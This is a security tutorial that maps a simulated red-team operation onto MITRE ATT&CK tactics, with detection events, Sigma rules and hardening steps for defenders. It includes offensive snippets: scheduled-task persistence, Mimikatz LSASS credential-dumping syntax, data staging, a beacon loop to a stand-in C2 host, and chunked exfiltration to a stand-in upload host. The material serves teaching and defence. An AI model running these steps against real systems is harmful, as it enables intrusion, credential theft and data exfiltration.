The Attack Lifecycle: Reconnaissance to Exfiltration

Objective: Understand how a real-world adversary operation unfolds across the full MITRE ATT&CK Enterprise lifecycle — from pre-engagement reconnaissance through to data exfiltration — and learn how each phase is executed by authorized red teams and detected and disrupted by defenders.

1. Red Teaming & the Attack Lifecycle — Why It Matters

MITRE ATT&CK categorizes the tactics, techniques, and procedures (TTPs) used by real-world threat actors into a standardized matrix of adversary behaviors spanning the entire attack lifecycle. It is organized into three layers:

Tactics — the tactical goals an adversary pursues (the “why”).
Techniques — the actions taken to achieve those goals (the “how”).
Procedures — the concrete technical steps to perform a technique.

The Enterprise matrix contains 14 tactics, beginning with Reconnaissance (TA0043) and ending with Impact. Unlike Lockheed Martin’s linear Cyber Kill Chain, ATT&CK is a behavior catalog — a red team uses it to plan a realistic operation, and a blue team uses the same IDs to measure detection coverage. This tutorial walks a simulated Windows enterprise engagement phase by phase, pairing each offensive step with its detection telemetry.

2. Pre-Engagement: Rules of Engagement and Scoping

No technique in this tutorial is legal without written authorization. A red team operation begins with a signed Rules of Engagement (RoE) document that fixes:

Scope Item	Purpose
In-scope IP ranges / domains	Bounds active scanning (`T1595`) and exploitation
Excluded systems	Protects production / safety-critical assets
Permitted TTPs	Authorizes phishing, credential access, lateral movement
Engagement window	Defines start/stop times and blackout periods
Emergency contacts	Enables immediate stand-down if impact escalates
Data handling	Governs how collected/exfiltrated data is stored and destroyed

Threat-model selection (e.g., emulating a specific intrusion set) drives which techniques are exercised. Everything that follows assumes explicit, documented authorization.

3. Reconnaissance & Resource Development (TA0043, TA0042)

Reconnaissance (TA0043) gathers information about the target environment for use in later phases. It splits into passive collection — which never touches target infrastructure — and active scanning.

Passive OSINT pulls from public data sources: WHOIS, Shodan, LinkedIn, and certificate transparency logs (T1590, T1589, T1593). Certificate transparency is especially valuable for surfacing subdomains and shadow infrastructure.

# Enumerate subdomains from certificate transparency logs (T1590)
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u

# Passive registration metadata (T1590)
whois example.com | grep -Ei 'Registrar|Name Server|Creation'

Active Scanning (T1595) — port and service discovery with tools like Nmap — is the most prominent Reconnaissance technique and the first activity that generates target-side telemetry.

Resource Development (TA0042) prepares the operational toolkit: acquiring infrastructure (T1583), establishing accounts (T1585), and obtaining or developing capabilities (T1588, T1587). For a red team this means standing up redirectors, C2 servers, and phishing domains before any contact with the target.

Flow diagram showing passive OSINT feeding active scanning, then resource development steps building C2 infrastructure — Reconnaissance and resource development run in parallel before any target contact, building the operational toolkit used in all later phases.

4. Initial Access (TA0001)

Initial Access (TA0001) is the most frequently employed tactic — it establishes the adversarial foothold. The dominant techniques are Phishing (T1566) and Valid Accounts (T1078), the latter gaining significant prominence in 2024.

Technique	MITRE ID	Foothold Vector
Spearphishing Attachment	`T1566.001`	Weaponized document delivered by email
Spearphishing Link	`T1566.002`	Credential-harvesting or payload URL
Exploit Public-Facing Application	`T1190`	Vulnerable internet-facing service
External Remote Services	`T1133`	Exposed VPN/RDP/Citrix gateway
Valid Accounts	`T1078`	Reused or leaked credentials

In a typical spearphishing scenario, a pretext email lures a user (T1204, User Execution) into opening an attachment that spawns a child process — the handoff point into the Execution tactic.

5. Execution & Persistence (TA0002, TA0003)

Execution (TA0002) runs adversary-controlled code on the host. Command and Scripting Interpreter (T1059) — particularly PowerShell (T1059.001) and the Windows command shell (T1059.003) — is the workhorse, alongside WMI (T1047) and scheduled tasks (T1053).

Persistence (TA0003) ensures the foothold survives reboots and logoffs. Common techniques are Boot or Logon Autostart Execution (T1547) and Scheduled Task/Job (T1053.005). The following illustrates a benign scheduled-task persistence pattern and the events it generates.

# Illustrative persistence via scheduled task (T1053.005)
$action  = New-ScheduledTaskAction -Execute "powershell.exe" `
            -Argument "-NoProfile -File C:\ProgramData\update.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "SystemUpdateCheck" `
    -Action $action -Trigger $trigger -RunLevel Highest

This single command produces Windows Event ID 4698 (scheduled task created) and Sysmon Event ID 1 (process creation) with powershell.exe as the task action — a high-fidelity detection pair.

6. Privilege Escalation, Defense Evasion & Credential Access (TA0004, TA0005, TA0006)

Privilege Escalation (TA0004) seeks elevated rights via Process Injection (T1055), Valid Accounts (T1078), and Create or Modify System Process (T1543). Defense Evasion (TA0005) then hides the activity — Indicator Removal (T1070) clears event logs, and Impair Defenses (T1562) disables security tooling.

Credential Access (TA0006) harvests authentication material. OS Credential Dumping: LSASS Memory (T1003.001) reads cleartext credentials and hashes from the LSASS process. The Mimikatz syntax below is a reference for understanding what the technique reads, not a functional payload.

# Mimikatz syntax reference — LSASS memory read (T1003.001)
privilege::debug              # acquire SeDebugPrivilege
sekurlsa::logonpasswords      # parse credential material from LSASS memory

The cross-process read of lsass.exe is exactly what Sysmon Event ID 10 (ProcessAccess) is tuned to catch, typically on a GrantedAccess mask of 0x1410.

7. Discovery (TA0007)

Discovery (TA0007) maps the internal environment once inside. Built-in commands provide low-noise enumeration of accounts (T1087), permission groups (T1069), remote systems (T1018), and host configuration (T1082, T1016).

# Internal recon mapped to Discovery techniques
whoami /all                       # T1033 — user, groups, privileges
Get-ADUser -Filter *              # T1087 — domain accounts
Get-ADGroupMember "Domain Admins" # T1069 — privileged group membership
nltest /domain_trusts             # T1482 — trust relationships
Get-ADComputer -Filter *          # T1018 — remote systems

Graph-based AD enumeration with SharpHound (the BloodHound collector) accelerates this phase by mapping attack paths to high-value objects. Because SharpHound queries many hosts in rapid succession, it surfaces in Sysmon Event ID 3 (network connection) as a fan-out of LDAP and SMB connections from a single process.

8. Lateral Movement (TA0008)

Lateral Movement (TA0008) expands the foothold toward sensitive systems after internal reconnaissance. In Windows-heavy environments the primary techniques are:

Technique	MITRE ID	Port / Mechanism
Remote Desktop Protocol	`T1021.001`	TCP 3389
SMB / Windows Admin Shares	`T1021.002`	TCP 445 (`ADMIN$`, `C$`)
Windows Remote Management	`T1021.006`	TCP 5985/5986 (WinRM)
Pass the Hash	`T1550.002`	NTLM hash reuse
Kerberoasting	`T1558.003`	TGS request for service accounts

Pass the Hash reuses a captured NTLM hash to authenticate without the plaintext password. Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline. A Ticket Encryption Type of 0x17 (RC4-HMAC) instead of 0x12 (AES256) across many Windows Event ID 4769 records in a short window is a strong Kerberoasting indicator. SMB-based movement via PsExec also leaves Sysmon Event ID 17/18 named-pipe artifacts.

Graph diagram showing three lateral movement techniques from a compromised workstation reaching a domain controller and the detection events each generates — All three primary lateral movement paths leave distinct Windows and Sysmon artifacts that defenders can correlate to identify unauthorized access.

9. Collection & Command and Control (TA0009, TA0011)

Collection (TA0009) gathers target data prior to exfiltration: Data from Local System (T1005), Data from Network Shared Drive (T1039), Email Collection (T1114), and Automated Collection (T1119). Collected data is then archived (T1560) to shrink and obscure it.

# Staging collected data (T1560) before exfiltration
Compress-Archive -Path C:\Users\jdoe\Documents\*.docx `
    -DestinationPath C:\ProgramData\stage.zip
certutil -encode C:\ProgramData\stage.zip C:\ProgramData\stage.b64

Command and Control (TA0011) maintains the operator channel. Application Layer Protocol: Web Protocols (T1071.001) blends C2 into normal HTTPS, defeating deep packet inspection; Encrypted Channel (T1573) and Protocol Tunneling (T1572) add further cover. Mature implants beacon low-and-slow with jittered sleep to evade volumetric detection.

# Conceptual HTTPS beacon loop (T1071.001) — illustrative, not implant code
import time, random, requests

while True:
    task = requests.get("https://cdn.example-c2.test/poll", verify=True)
    # ... process task, return results out-of-band ...
    sleep = 60 + random.randint(-15, 15)   # jitter to flatten beacon timing
    time.sleep(sleep)

10. Exfiltration (TA0010)

In Exfiltration (TA0010) the adversary steals the staged data. Because data is already collected and archived, the focus is moving it out without tripping volume or destination alarms.

Technique	MITRE ID	Channel
Exfiltration Over C2 Channel	`T1041`	Existing C2 path
Exfiltration Over Web Service	`T1567`	Cloud storage / SaaS
Exfiltration Over Alternative Protocol	`T1048`	DNS, FTP, etc.
Automated Exfiltration	`T1020`	Scripted transfer
Scheduled Transfer	`T1029`	Timed to blend with traffic
Data Transfer Size Limits	`T1030`	Chunking to stay under thresholds

Exfiltration Over Web Service (T1567) is favored because hosts already communicate with popular SaaS providers, firewall rules likely permit that traffic, and provider SSL/TLS hides the payload. Chunking (T1030) keeps each transfer below detection thresholds.

# Conceptual chunked exfil over a web service (T1567 + T1030) — illustrative
CHUNK = 512 * 1024   # cap per request to stay under size thresholds
with open("stage.b64", "rb") as f:
    while (block := f.read(CHUNK)):
        requests.post("https://storage.example-saas.test/upload",
                      data=block, verify=True)

Flow diagram illustrating the data pipeline from collection through archiving, chunking, and HTTPS exfiltration past defensive egress controls — Attackers compress and chunk staged data before routing it over trusted SaaS channels, deliberately mimicking legitimate traffic to evade volume-based detection.

11. Common Attacker Techniques Across the Lifecycle

Technique	Description
Active Scanning (`T1595`)	Enumerate exposed services and vulnerable software
Phishing (`T1566`)	Deliver payloads or harvest credentials via email
PowerShell Execution (`T1059.001`)	Run fileless tooling in-memory
Scheduled Task Persistence (`T1053.005`)	Survive reboot via task triggers
LSASS Dumping (`T1003.001`)	Extract credentials from process memory
Pass the Hash (`T1550.002`)	Reuse NTLM hashes for lateral auth
Kerberoasting (`T1558.003`)	Crack service-account tickets offline
Web Protocol C2 (`T1071.001`)	Hide command channel in HTTPS
Exfil Over Web Service (`T1567`)	Steal data through trusted SaaS

12. Defensive Strategies & Detection

Detection is most effective when Sysmon events are chained across phases rather than alerted in isolation.

Sysmon Event ID	Catches	Lifecycle Phase
`1`	Process creation	Execution, Discovery, Lateral Movement
`3`	Network connection	Recon fan-out, C2, exfil volume
`7`	Image load	DLL injection into `svchost.exe`/`explorer.exe`
`10`	Process access	LSASS dumping (`T1003.001`)
`11`	File create	Staging (`.zip`), ticket exfil (`.kirbi`)
`17`/`18`	Named pipe create/connect	PsExec / SMB movement
`22`	DNS query	Abnormal lookups during recon/C2

Pair Sysmon with Windows Security auditing: Event 4624 (logon), 4688 (process + command line), 4698 (scheduled task), 4769 (Kerberos service ticket — watch for 0x17), and 5140/5156 (share access and allowed connections). Enable Audit Process Creation with command-line logging, PowerShell Script Block Logging, and Audit Kerberos Service Ticket Operations. ETW providers such as Microsoft-Windows-PowerShell, Microsoft-Windows-Kernel-Network, and Microsoft-Windows-SMBClient deepen visibility.

A representative Sigma rule chains suspicious PowerShell with an outbound connection:

title: PowerShell Process With Outbound Network Connection
logsource:
  product: windows
  service: sysmon
detection:
  proc:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - 'DownloadString'
      - 'IEX'
  net:
    EventID: 3
    Image|endswith: '\powershell.exe'
  condition: proc and net
level: high

MITRE ATT&CK mapping for the primary abuse primitives:

Technique	MITRE ID	Detection
Process Injection	`T1055`	Sysmon Event ID 7/10
LSASS Memory Dumping	`T1003.001`	Sysmon Event ID 10, `GrantedAccess 0x1410`
Scheduled Task	`T1053.005`	Event ID 4698, Sysmon Event ID 1
Kerberoasting	`T1558.003`	Event ID 4769, RC4 (`0x17`) tickets
Pass the Hash	`T1550.002`	Event ID 4624 type 3 + NTLM anomalies
Web Protocol C2	`T1071.001`	Sysmon Event ID 3/22 beacon timing
Exfil Over Web Service	`T1567`	Sysmon Event ID 3 + DLP egress volume

Hardening per phase: minimize public attack surface and monitor certificate transparency; enforce MFA and patch internet-facing services (T1190); deploy Sysmon with Windows Event Forwarding to a SIEM; segment networks to restrict RDP/SMB; enable Credential Guard and AES256 Kerberos to eliminate RC4 Kerberoasting; and apply DLP with egress filtering against cloud-storage exfiltration.

Conceptual illustration of a layered defensive detection system correlating threat events across an attack timeline — Effective detection chains Sysmon and Windows audit events across every phase of the attack lifecycle rather than alerting on isolated indicators.

13. Tools for Attack Lifecycle Analysis

Tool	Description	Link
Sysmon	High-fidelity endpoint event logging	microsoft.com
ATT&CK Navigator	Visualize technique coverage and gaps	mitre-attack.github.io
BloodHound / SharpHound	Map AD attack paths (and detect them)	bloodhound.specterops.io
Volatility	Memory forensics for injection/LSASS access	volatilityfoundation.org
Sigma	Vendor-neutral detection rule format	sigmahq.io
Nmap	Active scanning and service discovery	nmap.org
Wireshark	Inspect C2 and exfil network traffic	wireshark.org

For an engagement debrief, encode the simulated operation as an ATT&CK Navigator layer so the blue team can see exactly which techniques were exercised and where coverage was missing:

{
  "name": "Lifecycle Engagement - 2024",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1595", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1566", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1059", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1003", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1021", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1071", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1567", "score": 100, "color": "#e60d0d" }
  ]
}

Summary

The attack lifecycle is a continuous chain of ATT&CK tactics — Reconnaissance to Exfiltration — that red teams emulate and blue teams measure with the same technique IDs.
Early phases (TA0043, TA0042, TA0001) establish a foothold through scanning, phishing, and valid-account abuse, while mid-chain phases escalate, evade, and harvest credentials (T1055, T1003.001, T1558.003).
Lateral movement (T1021, T1550.002) and C2 (T1071.001) expand and sustain access before staged data is archived (T1560) and exfiltrated over trusted channels (T1041, T1567).
Detection works best by chaining Sysmon events (1, 3, 10, 11, 17/18, 22) with Windows audit IDs (4688, 4698, 4769) and Sigma rules across phases.
Map every emulated technique into an ATT&CK Navigator layer to expose detection gaps and drive defensive hardening.

Archive